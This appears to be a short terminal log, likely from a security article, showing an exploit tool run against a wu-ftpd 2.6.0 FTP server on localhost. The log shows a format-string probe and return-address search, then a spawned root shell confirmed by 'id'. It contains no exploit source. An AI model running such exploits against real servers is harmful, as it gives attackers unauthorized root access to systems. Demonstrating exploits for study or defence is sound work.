(view this code in a separate window)
machine$ wu-lnx ftpserver Connected to: localhost Banner: 220 ftpserver FTP server (Version wu-2.6.0(1) Mon Feb 28 10:30:36 EST 2000) Logged in... Finding ret addresses Wuftpd is vulnerable : 200-31 bffff1f8 1ee bfffd180 +bfffcd7c |0200 (end of '%x %x %x %x +%x |%x') Ret location befor: 0 Ret location : bfffcd24 Proctitle addres : 807347b and 134689915 tmp 1 : 0x62626262tmp 2 : 0x0 tmp 1 : 0xbfffcd24 Cached a : 24 Trying with : 23 Wait for a shell..... 200-aaaaaaaaaaaaaaaaaaaaaaaaaaaaaabbbb$Íÿ¿-2-2000-200000000 00000000000000000000-2-240nan0-10737520721074538445-1073752 (...lots of garbage edited...) 000000000000000000000000000000000id uid=0(root) gid=0(root) egid=50(ftp) groups=50(ftp) pwd / ls -C bin dev home lost+found opt root tftpboot usr boot etc lib mnt proc sbin tmp var exitConnection closed - EOF machine$